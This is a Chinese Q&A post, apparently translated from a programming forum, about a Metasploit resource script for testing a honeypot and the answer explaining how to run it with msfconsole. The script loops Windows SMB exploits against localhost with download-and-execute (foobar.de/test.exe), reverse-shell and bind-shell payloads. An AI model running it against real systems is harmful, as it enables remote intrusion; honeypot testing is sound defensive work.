我正在尝试执行ruby脚本,该脚本应该测试蜜罐的一些功能: 这是脚本:
version
<ruby>
sleep(1)
shellcodes = {
'download:exec' => {
'payload' => 'windows/download_exec',
'options' => {
'URL' => 'http://foobar.de/test.exe'
}
},
'shell:reverse' => {
'payload' => 'windows/shell/reverse_tcp',
'options' => {
'LHOST' => '127.0.0.1',
'LPORT' => 4445
}
},
'shell:bind' => {
'payload' => 'windows/shell/bind_tcp',
'options' => {
'LPORT' => 4444
}
},
'exec' => {
'payload' => 'windows/exec',
'options' => {
'CMD' => 'echo foo'
}
}
}
exploits = {
'ms03-049' => {
'exploit' => 'exploit/windows/smb/ms03_049_netapi',
'shellcode' => {
'allow' => ['download:exec']
}
},
'ms04-007' => {
'exploit' => 'exploit/windows/smb/ms04_007_killbill',
'shellcode' => {
'allow' => ['download:exec']
}
},
'ms04-011' => {
'exploit' => 'exploit/windows/smb/ms04_011_lsass',
'shellcode' => {
'allow' => ['download:exec']
}
},
'ms04-031' => {
'exploit' => 'exploit/windows/smb/ms04_031_netdde',
'shellcode' => {
'allow' => ['download:exec']
}
},
'ms05-039' => {
'exploit' => 'exploit/windows/smb/ms05_039_pnp',
'shellcode' => {
'allow' => ['download:exec']
}
},
# 'ms06-025' => {
# 'exploit' => ['exploit/windows/smb/ms06_025_rasmans_reg','exploit/windows/smb/ms06_025_rasmans_rras']
# },
'ms06-040' => {
'exploit' => 'exploit/windows/smb/ms06_040_netapi',
'shellcode' => {
'allow' => ['download:exec']
}
},
# 'ms06-066' => {
# 'exploit' => ['exploit/windows/smb/ms06_066_nwapi','exploit/windows/smb/ms06_066_nwwks'],
# },
'ms06-070' => {
'exploit' => 'exploit/windows/smb/ms06_070_wkssvc',
'shellcode' => {
'allow' => ['download:exec']
}
},
'ms07-029' => {
'exploit' => 'exploit/windows/smb/ms07_029_msdns_zonename',
'shellcode' => {
'allow' => ['download:exec']
}
},
'ms08-067' => {
'exploit' => 'exploit/windows/smb/ms08_067_netapi',
'shellcode' => {
'allow' => ['download:exec']
}
},
'ms09-050' => {
'exploit' => 'exploit/windows/smb/ms09_050_smb2_negotiate_func_index',
'options' => {
'WAIT' => 2
},
'shellcode' => {
'allow' => ['download:exec']
}
},
'ms10-061' => {
'exploit' => 'exploit/windows/smb/ms10_061_spoolss',
'options' => {
'PNAME' => 'XPSPrinter'
}
}
}
while (true)
exploits.each { |xpk, xpv|
print_status("Running #{xpk}")
run_single("use #{xpv['exploit']}")
run_single("set RHOST 127.0.0.1")
if xpv.has_key?('options') then
options = xpv['options']
options.each { |key,value|
run_single("set #{key} #{value}")
}
end
isallowed = true
if xpv.has_key?('shellcode') then
isallowed = false
allow = xpv['shellcode']['allow']
else
allow = []
end
shellcodes.each { |sck, scv|
allowed = isallowed
allow.each { |a|
if sck.match(/#{a}/) then
allowed = true
if xpv['shellcode'].has_key?('deny') then
deny = xpv['shellcode']['deny']
deny.each { |d|
# print_status("deny #{sck} #{d}")
if sck.match(/#{d}/) then
allowed = false
break
end
}
end
break
end
}
if not allowed then
next
end
run_single("set PAYLOAD #{scv['payload']}")
options = scv['options']
options.each { |key,value|
run_single("set #{key} #{value}")
}
sleep(1)
print_status("Exploit #{xpk} Payload #{scv['payload']}")
run_single("exploit")
}
}
end
</ruby>
当我尝试执行($ ruby script.rb)时,它给出了以下错误:
resource rc:3: syntax error, unexpected '<', expecting end-of-input
<ruby>
我必须告诉你,我不知道在ruby中编程。我只想执行该脚本。我试图在互联网上找到关于红宝石脚本结构的东西,但没有,所以我向你求助。
答案 0 :(得分:2)
这不是 Ruby 脚本,而是 Metasploit 脚本。
假设其名称为script.rc,您应该按照以下方式运行:msfconsole -r script.rc,而不是ruby script.rc。
或者,如果您已经在msfconsole,请按以下方式运行:resource script.rc